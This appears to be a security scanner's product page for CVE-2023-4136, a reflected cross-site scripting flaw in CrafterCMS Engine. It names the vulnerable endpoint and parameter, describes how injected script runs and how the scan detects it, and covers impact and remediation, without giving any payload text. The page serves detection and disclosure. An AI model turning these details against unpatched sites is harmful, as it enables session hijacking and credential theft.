CVE-2023-4136 Scanner

CVE-2023-4136 Scanner - Cross-Site Scripting vulnerability in CrafterCMS Engine

Short Info


Level

Medium

Single Scan

Single Scan

Can be used by

Asset Owner

Estimated Time

10 seconds

Time Interval

8 days 19 hours

Scan only one

Domain, Subdomain, IPv4

Toolbox

-

CrafterCMS Engine is an open-source content management system used by developers and organizations to build and manage web content dynamically. It provides a flexible platform for creating websites and digital experiences with modular architecture. The software is designed to be extensible and supports various plugins and APIs for content transformation and delivery. It is widely adopted for its ease of integration and scalability across different industries. The engine is maintained by a community of developers and is regularly updated to fix bugs and security issues. It is used by enterprises seeking customizable CMS solutions.

The detected vulnerability is a reflected Cross-Site Scripting (XSS) issue that arises due to improper sanitization of user input in the transformerName parameter. This parameter is part of the /api/1/site/url/transform endpoint and is vulnerable to injection of malicious JavaScript code. Attackers can exploit this flaw by crafting URLs containing JavaScript payloads that execute in the context of unsuspecting users. Such exploitation can lead to theft of user credentials, session hijacking, or execution of arbitrary actions on behalf of the user. This vulnerability requires user interaction to trigger, typically via a malicious link.

Technically, the vulnerability exists because the transformerName parameter is reflected directly in the HTTP response without adequate encoding or validation. When a specially crafted script tag is injected, it causes the browser to interpret and run the script. The scan detects this by sending a request with a script payload and checking the response body for the injected script code along with specific status codes and content types. The presence of error messages and the unescaped script in the response confirm the vulnerability. This indicates a lack of proper input filtering and output escaping in the web application.

If exploited, attackers can perform malicious actions within the security context of the affected user, such as stealing session cookies, redirecting users to malicious websites, or manipulating displayed content. This can compromise user privacy and security, leading to further attacks on the application or its users. The impact is typically on the confidentiality and integrity of user data. Remediation involves patching the software to sanitize inputs and properly encode outputs to prevent script execution.

REFERENCES

Get started to protecting your digital assets